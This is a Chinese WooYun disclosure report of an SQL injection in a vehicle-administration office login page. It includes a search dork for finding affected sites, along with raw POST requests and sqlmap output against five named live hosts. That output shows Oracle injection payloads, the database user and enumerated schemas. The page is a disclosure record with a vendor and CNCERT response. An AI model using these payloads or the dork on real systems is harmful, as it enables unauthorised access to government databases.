当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103441

漏洞标题:车管所系统存在通用SQL注入漏洞

相关厂商:山东国安信息产业有限责任公司

漏洞作者: 路人甲

提交时间:2015-03-24 14:55

修复时间:2015-06-25 16:42

公开时间:2015-06-25 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向第三方安全合作伙伴开放
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

车管所系统存在通用SQL注入漏洞

详细说明:

前人经验 WooYun: 车管所系统通用SQL注入(影响大量车管所网站)
搜索引擎关键字:inurl:/qsjsrzj/logindw.jsp

123.jpg


登录框用户名(userName)存在注入,5个案例说明问题
1、

POST http://www.lcwscgs.com/qsjsrzj/logindw.do HTTP/1.1
Host: www.lcwscgs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.lcwscgs.com/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000gNhVnvi-a9ABsnx9ShnEUQ_:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:15:56] [INFO] parsing HTTP request from 'd:\post2.txt'
[14:15:56] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:15:56] [INFO] resuming back-end DBMS 'oracle'
[14:15:56] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://www.lcwscgs.com/qsjsrzj/logindw.jsp'. Do yo
u want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: userName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: userName=1' AND 3308=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(10
0)||CHR(102)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (3308=3308) THEN 1 ELSE 0 EN
D) FROM DUAL)||CHR(58)||CHR(109)||CHR(118)||CHR(107)||CHR(58)||CHR(62))) FROM DU
AL) AND 'Bvct'='Bvct&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: userName=1' AND 2882=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(121)||C
HR(67)||CHR(74),5) AND 'oIGy'='oIGy&password=2&dwdh=&mm=&yhlb=&state=&type=login
person
---
[14:16:02] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:16:02] [INFO] fetching current user
[14:16:02] [INFO] resumed: QSWEBCGS_USER
current user:    'QSWEBCGS_USER'
[14:16:02] [INFO] fetching current database
[14:16:02] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle):    'QSWEBCGS_USER'
[14:16:02] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[14:16:02] [INFO] fetching database (schema) names
[14:16:02] [INFO] the SQL query used returns 35 entries
available databases [35]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] LCZW
[*] MDSYS
[*] NLV_ADMIN
[*] ODM
[*] ODM_MTR


2、

POST http://218.59.228.162/qsjsrzj/logindw.do HTTP/1.1
Host: 218.59.228.162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://218.59.228.162/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000sN7HMkFUGLQ61Z-E7kvw3Gj:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:16:49] [INFO] parsing HTTP request from 'd:\post3.txt'
[14:16:49] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:16:49] [INFO] resuming back-end DBMS 'oracle'
[14:16:49] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://218.59.228.162/qsjsrzj/logindw.jsp'. Do you
 want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: userName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: userName=1' AND 5634=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(11
4)||CHR(122)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (5634=5634) THEN 1 ELSE 0 EN
D) FROM DUAL)||CHR(58)||CHR(115)||CHR(114)||CHR(115)||CHR(58)||CHR(62))) FROM DU
AL) AND 'VcZA'='VcZA&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
---
[14:16:56] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:16:56] [INFO] fetching current user
[14:16:56] [INFO] resumed: QSWEBCGS_USER
current user:    'QSWEBCGS_USER'
[14:16:56] [INFO] fetching current database
[14:16:56] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle):    'QSWEBCGS_USER'
[14:16:56] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[14:16:56] [INFO] fetching database (schema) names
[14:16:56] [INFO] the SQL query used returns 32 entries
available databases [32]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] EXFSYS
[*] GXHPJINING_USER
[*] HPGL_USER
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS


3、

POST http://www.dygajj.gov.cn:9080/qsjsrzj/logindw.do HTTP/1.1
Host: www.dygajj.gov.cn:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.dygajj.gov.cn:9080/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000f5VIbvTvlvEVS7AuZTPjR48:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:17:16] [INFO] parsing HTTP request from 'd:\post4.txt'
[14:17:16] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:17:16] [INFO] resuming back-end DBMS 'oracle'
[14:17:16] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://www.dygajj.gov.cn:9080/qsjsrzj/logindw.jsp'
. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: userName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: userName=1' AND 5353=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(11
0)||CHR(104)||CHR(115)||CHR(58)||(SELECT (CASE WHEN (5353=5353) THEN 1 ELSE 0 EN
D) FROM DUAL)||CHR(58)||CHR(99)||CHR(101)||CHR(118)||CHR(58)||CHR(62))) FROM DUA
L) AND 'xfIk'='xfIk&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
---
[14:17:17] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:17:17] [INFO] fetching current user
[14:17:17] [INFO] resumed: QSWEBCGS_USER
current user:    'QSWEBCGS_USER'
[14:17:17] [INFO] fetching current database
[14:17:17] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle):    'QSWEBCGS_USER'
[14:17:17] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[14:17:17] [INFO] fetching database (schema) names
[14:17:17] [INFO] the SQL query used returns 28 entries
available databases [28]:
[*] CTXSYS
[*] DRV_ADMIN
[*] HR
[*] MDSYS
[*] None
[*] ODM


4、

POST http://58.59.39.43:9080/qsjsrzj/logindw.do HTTP/1.1
Host: 58.59.39.43:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://58.59.39.43:9080/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=00009f17zBSkxUTkXtCKT1FV4aO:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:17:41] [INFO] parsing HTTP request from 'd:\post5.txt'
[14:17:41] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:17:41] [INFO] resuming back-end DBMS 'oracle'
[14:17:41] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://58.59.39.43:9080/qsjsrzj/logindw.jsp'. Do y
ou want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: userName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: userName=1' AND 1290=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(11
3)||CHR(121)||CHR(102)||CHR(58)||(SELECT (CASE WHEN (1290=1290) THEN 1 ELSE 0 EN
D) FROM DUAL)||CHR(58)||CHR(109)||CHR(105)||CHR(100)||CHR(58)||CHR(62))) FROM DU
AL) AND 'GdcV'='GdcV&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: userName=1' AND 2098=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(69)||C
HR(87)||CHR(76),5) AND 'fxSY'='fxSY&password=2&dwdh=&mm=&yhlb=&state=&type=login
person
---
[14:17:47] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:17:47] [INFO] fetching current user
[14:17:47] [INFO] resumed: QSWEBCGS_USER
current user: 'QSWEBCGS_USER'
[14:17:47] [INFO] fetching current database
[14:17:47] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle): 'QSWEBCGS_USER'
[14:17:47] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[14:17:47] [INFO] fetching database (schema) names
[14:17:47] [INFO] the SQL query used returns 32 entries
available databases [32]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
5、

POST http://221.2.145.164:9080/qsjsrzj/logindw.do HTTP/1.1
Host: 221.2.145.164:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://221.2.145.164:9080/qsjsrzj/logindw.jsp
Cookie: JSESSIONID=0000v5isUqUI1ayO-py6ht_6szG:-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
userName=1&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson


[14:18:18] [INFO] parsing HTTP request from 'd:\post6.txt'
[14:18:18] [WARNING] provided parameter 'userName' is not inside the Cookie
[14:18:18] [INFO] resuming back-end DBMS 'oracle'
[14:18:18] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://221.2.145.164:9080/qsjsrzj/logindw.jsp'. Do
 you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: userName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: userName=1' AND 3558=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(11
5)||CHR(121)||CHR(114)||CHR(58)||(SELECT (CASE WHEN (3558=3558) THEN 1 ELSE 0 EN
D) FROM DUAL)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(58)||CHR(62))) FROM DU
AL) AND 'NWQa'='NWQa&password=2&dwdh=&mm=&yhlb=&state=&type=loginperson
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: userName=1' AND 8327=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(80)||CH
R(68)||CHR(89),5) AND 'PNXw'='PNXw&password=2&dwdh=&mm=&yhlb=&state=&type=loginp
erson
---
[14:18:28] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:18:28] [INFO] fetching current user
you provided a HTTP Cookie header value. The target url provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[14:18:34] current user:    'QSWEBCGS_USER'
[14:18:34] [INFO] fetching current database
[14:18:34] [INFO] resumed: QSWEBCGS_USER
current schema (equivalent to database on Oracle):    'QSWEBCGS_USER'
[14:18:34] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[14:18:34] [INFO] fetching database (schema) names
[14:18:34] [INFO] the SQL query used returns 32 entries
available databases [32]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR


漏洞证明:

已经证明

修复方案:

过滤参数

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-27 16:41

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无